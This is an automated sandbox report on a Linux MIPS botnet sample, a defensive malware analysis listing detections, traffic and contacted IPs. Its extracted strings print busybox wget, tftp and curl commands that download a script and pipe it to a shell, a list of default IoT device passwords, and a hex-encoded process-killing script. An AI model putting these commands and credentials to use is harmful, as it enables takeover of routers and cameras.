Linux Analysis Report
la.bot.mips.elf

Overview

General Information

Sample name: la.bot.mips.elf
Analysis ID: 1543570
MD5: 81fa3e33e30a594b8f8fa8b672247f61
SHA1: 8589524dc7ca979148781a5a586a90b626a2a17d
SHA256: 2899e4389922c8271c0dad14c2a9d549da9bb4b0d19e1f9474532f881e8a72f5
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Sends malformed DNS queries
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: la.bot.mips.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: la.bot.mips.elf ReversingLabs: Detection: 36%
Source: la.bot.mips.elf Virustotal: Detection: 36% Perma Link
Found strings indicative of a multi-platform dropper
Source: la.bot.mips.elf String: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.mips.elf String: /proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp/lib//lib64//fd/mountinfo/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc/
Source: la.bot.mips.elf String: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 156.244.13.91 ports 3,4,6,7,9,49376
Sends malformed DNS queries
Source: global traffic DNS traffic detected: malformed DNS query: fortyfivehundred.dyn. [malformed]
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 56602
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.13:49896 -> 156.244.13.91:49376
Sample listens on a socket
Source: /tmp/la.bot.mips.elf (PID: 5437) Socket: 127.0.0.1:1234 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 192.223.51.12
Source: unknown TCP traffic detected without corresponding DNS query: 9.81.37.30
Source: unknown TCP traffic detected without corresponding DNS query: 192.223.51.12
Source: unknown TCP traffic detected without corresponding DNS query: 9.81.37.30
Source: unknown TCP traffic detected without corresponding DNS query: 109.71.113.203
Source: unknown TCP traffic detected without corresponding DNS query: 9.167.6.200
Source: unknown TCP traffic detected without corresponding DNS query: 109.71.113.203
Source: unknown TCP traffic detected without corresponding DNS query: 9.167.6.200
Source: unknown TCP traffic detected without corresponding DNS query: 142.204.227.110
Source: unknown TCP traffic detected without corresponding DNS query: 142.204.227.110
Source: unknown TCP traffic detected without corresponding DNS query: 32.72.230.112
Source: unknown TCP traffic detected without corresponding DNS query: 103.234.91.101
Source: unknown TCP traffic detected without corresponding DNS query: 32.72.230.112
Source: unknown TCP traffic detected without corresponding DNS query: 103.234.91.101
Source: unknown TCP traffic detected without corresponding DNS query: 9.193.73.16
Source: unknown TCP traffic detected without corresponding DNS query: 9.193.73.16
Source: unknown TCP traffic detected without corresponding DNS query: 82.166.250.29
Source: unknown TCP traffic detected without corresponding DNS query: 219.180.103.55
Source: unknown TCP traffic detected without corresponding DNS query: 82.166.250.29
Source: unknown TCP traffic detected without corresponding DNS query: 117.34.44.180
Source: unknown TCP traffic detected without corresponding DNS query: 219.180.103.55
Source: unknown TCP traffic detected without corresponding DNS query: 2.201.112.75
Source: unknown TCP traffic detected without corresponding DNS query: 117.34.44.180
Source: unknown TCP traffic detected without corresponding DNS query: 2.201.112.75
Source: unknown TCP traffic detected without corresponding DNS query: 145.202.85.118
Source: unknown TCP traffic detected without corresponding DNS query: 197.198.90.90
Source: unknown TCP traffic detected without corresponding DNS query: 145.202.85.118
Source: unknown TCP traffic detected without corresponding DNS query: 140.9.98.177
Source: unknown TCP traffic detected without corresponding DNS query: 197.198.90.90
Source: unknown TCP traffic detected without corresponding DNS query: 25.109.198.111
Source: unknown TCP traffic detected without corresponding DNS query: 140.9.98.177
Source: unknown TCP traffic detected without corresponding DNS query: 98.193.184.70
Source: unknown TCP traffic detected without corresponding DNS query: 25.109.198.111
Source: unknown TCP traffic detected without corresponding DNS query: 18.52.71.221
Source: unknown TCP traffic detected without corresponding DNS query: 98.193.184.70
Source: unknown TCP traffic detected without corresponding DNS query: 182.70.212.180
Source: unknown TCP traffic detected without corresponding DNS query: 18.52.71.221
Source: unknown TCP traffic detected without corresponding DNS query: 176.21.174.25
Source: unknown TCP traffic detected without corresponding DNS query: 182.70.212.180
Source: unknown TCP traffic detected without corresponding DNS query: 13.129.178.226
Source: unknown TCP traffic detected without corresponding DNS query: 176.21.174.25
Source: unknown TCP traffic detected without corresponding DNS query: 58.81.77.26
Source: unknown TCP traffic detected without corresponding DNS query: 13.129.178.226
Source: unknown TCP traffic detected without corresponding DNS query: 18.105.143.153
Source: unknown TCP traffic detected without corresponding DNS query: 58.81.77.26
Source: unknown TCP traffic detected without corresponding DNS query: 163.130.66.94
Source: unknown TCP traffic detected without corresponding DNS query: 18.105.143.153
Source: unknown TCP traffic detected without corresponding DNS query: 24.101.176.41
Source: unknown TCP traffic detected without corresponding DNS query: 163.130.66.94
Source: unknown TCP traffic detected without corresponding DNS query: 67.230.166.180
Source: global traffic DNS traffic detected: DNS query: fortyfivehundred.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: 75cents.libre
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: la.bot.mips.elf String found in binary or memory: http:///curl.sh
Source: la.bot.mips.elf String found in binary or memory: http:///wget.sh
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sample String containing 'busybox' found: (usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sample String containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample tries to kill a process (SIGKILL)
Source: /tmp/la.bot.mips.elf (PID: 5439) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: classification engine Classification label: mal76.troj.evad.linELF@0/0@4/0

Data Obfuscation
barindex
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Source: /tmp/la.bot.mips.elf (PID: 5440) File: /etc/config Jump to behavior
Creates hidden files and/or directories
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /root/.cache Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /root/.ssh Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /root/.config Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /root/.local Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /tmp/.X11-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /tmp/.Test-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /tmp/.font-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /tmp/.ICE-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /tmp/.XIM-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5440) Directory: /etc/.java Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/230/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/110/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/231/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/111/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/232/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/112/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/233/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/113/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/234/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/114/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/235/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/115/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/236/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/116/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/237/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/117/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/238/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/118/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/239/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/119/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/914/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/10/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/917/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/11/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/12/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/13/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/14/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/15/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/16/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/17/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/18/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/19/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/240/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/120/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/241/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/121/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/242/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/1/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/122/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/243/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/2/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/123/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/244/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/3/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/124/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/245/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/125/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/4/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/246/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/126/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/5/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/247/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/127/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/6/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/248/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/128/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/7/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/249/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/129/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/8/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/800/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/9/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/802/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/803/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/20/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/21/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/22/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/23/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/24/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/25/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/26/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/27/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/28/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/29/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/490/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/250/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/371/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/130/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/251/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/131/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/252/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/132/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/253/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/254/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/134/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/255/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/256/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/257/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/378/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/258/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/259/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/936/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/30/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/816/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/35/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/260/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/261/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/262/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/142/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/263/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/264/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/265/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/145/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/266/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5439) File opened: /proc/267/fd Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes system log files
Source: /tmp/la.bot.mips.elf (PID: 5440) Log files deleted: /var/log/kern.log Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 56602
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/la.bot.mips.elf (PID: 5437) Queries kernel information via 'uname': Jump to behavior
Source: la.bot.mips.elf, 5437.1.0000563dca409000.0000563dca4b0000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: la.bot.mips.elf, 5437.1.00007fff2b10d000.00007fff2b12e000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/la.bot.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.mips.elf
Source: la.bot.mips.elf, 5437.1.00007fff2b10d000.00007fff2b12e000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: la.bot.mips.elf, 5437.1.0000563dca409000.0000563dca4b0000.rw-.sdmp Binary or memory string: =V!/etc/qemu-binfmt/mips

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
130.85.8.81
 unknown United States
11131 UMBC-ASUS false
88.58.67.154
 unknown Italy
3269 ASN-IBSNAZIT false
12.88.113.252
 unknown United States
7018 ATT-INTERNET4US false
100.61.198.221
 unknown United States
701 UUNETUS false
221.97.129.154
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
116.125.235.248
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
175.71.130.56
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
88.31.149.246
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
182.40.212.86
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
223.45.233.82
 unknown Korea Republic of
9644 SKTELECOM-NET-ASSKTelecomKR false
105.145.198.169
 unknown Morocco
6713 IAM-ASMA false
68.28.170.249
 unknown United States
3651 SPRINT-BB6US false
52.208.132.172
 unknown United States
16509 AMAZON-02US false
144.252.74.144
 unknown United States
668 DNIC-AS-00668US false
140.194.219.7
 unknown United States
4010 DNIC-AS-04010US false
29.32.35.91
 unknown United States
7922 COMCAST-7922US false
191.99.221.115
 unknown Ecuador
27738 EcuadortelecomSAEC false
101.90.254.15
 unknown China
4812 CHINANET-SH-APChinaTelecomGroupCN false
74.128.172.30
 unknown United States
10796 TWC-10796-MIDWESTUS false
184.216.143.138
 unknown United States
10507 SPCSUS false
45.171.253.252
 unknown Brazil
268737 CONECTTELECOMCOMUNICACAOLTDABR false
3.215.216.192
 unknown United States
14618 AMAZON-AESUS false
151.27.75.133
 unknown Italy
1267 ASN-WINDTREIUNETEU false
2.63.114.225
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
203.111.230.165
 unknown Philippines
10139 SMARTBRO-PH-APSmartBroadbandIncPH false
185.196.74.150
 unknown France
35280 ACORUSFR false
122.245.124.90
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
160.7.225.182
 unknown United States
210 WEST-NET-WESTUS false
73.51.95.172
 unknown United States
7922 COMCAST-7922US false
138.97.30.128
 unknown Brazil
264117 FibramaisTelecomLtdaBR false
49.235.37.215
 unknown China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa false
154.54.76.58
 unknown United States
174 COGENT-174US false
68.32.41.38
 unknown United States
7922 COMCAST-7922US false
47.252.172.11
 unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false
64.69.92.239
 unknown Canada
54643 IDIGITALCA false
46.98.134.204
 unknown Ukraine
15377 FREGATUA false
6.243.199.174
 unknown United States
3356 LEVEL3US false
166.192.125.189
 unknown United States
20057 ATT-MOBILITY-LLC-AS20057US false
92.100.174.38
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
20.115.115.161
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
177.1.131.100
 unknown Brazil
8167 BrasilTelecomSA-FilialDistritoFederalBR false
198.5.110.174
 unknown United States
701 UUNETUS false
156.67.253.235
 unknown Germany
8468 ENTANETENTANETInternationalLimitedGB false
78.254.36.157
 unknown France
12322 PROXADFR false
216.23.208.6
 unknown United States
11766 MERIPLEX-1-ASUS false
185.169.204.218
 unknown Germany
35244 KMS-DE_ASDE false
46.173.203.9
 unknown Czech Republic
197550 ASINET4YOUCZ false
100.17.104.103
 unknown United States
701 UUNETUS false
131.82.21.248
 unknown United States
27046 DNIC-ASBLK-27032-27159US false
199.101.207.16
 unknown United States
32490 HI-SPEED-US false
215.187.191.201
 unknown United States
721 DNIC-ASBLK-00721-00726US false
84.192.155.147
 unknown Belgium
6848 TELENET-ASBE false
52.19.31.43
 unknown United States
16509 AMAZON-02US false
182.8.68.183
 unknown Indonesia
23693 TELKOMSEL-ASN-IDPTTelekomunikasiSelularID false
167.113.223.73
 unknown United States
2055 LSU-1US false
97.86.55.154
 unknown United States
20115 CHARTER-20115US false
132.22.240.170
 unknown United States
385 AFCONC-BLOCK1-ASUS false
114.230.239.198
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
100.209.80.146
 unknown United States
21928 T-MOBILE-AS21928US false
154.91.164.199
 unknown Seychelles
40065 CNSERVERSUS false
210.159.61.74
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
82.106.251.145
 unknown Italy
3269 ASN-IBSNAZIT false
199.247.167.236
 unknown Canada
841 CANET2-ASNCA false
211.232.239.206
 unknown Korea Republic of
17854 CABLELINE-AS-KRTbroadjeonjubroadcastKR false
63.57.95.123
 unknown United States
701 UUNETUS false
54.141.156.4
 unknown United States
14618 AMAZON-AESUS false
194.142.138.73
 unknown Finland
1759 TSF-IP-CORETeliaFinlandOyjEU false
18.42.0.155
 unknown United States
3 MIT-GATEWAYSUS false
146.21.111.193
 unknown Sweden
56736 VASTRAGOTALANDSREGIONENSE false
62.97.48.75
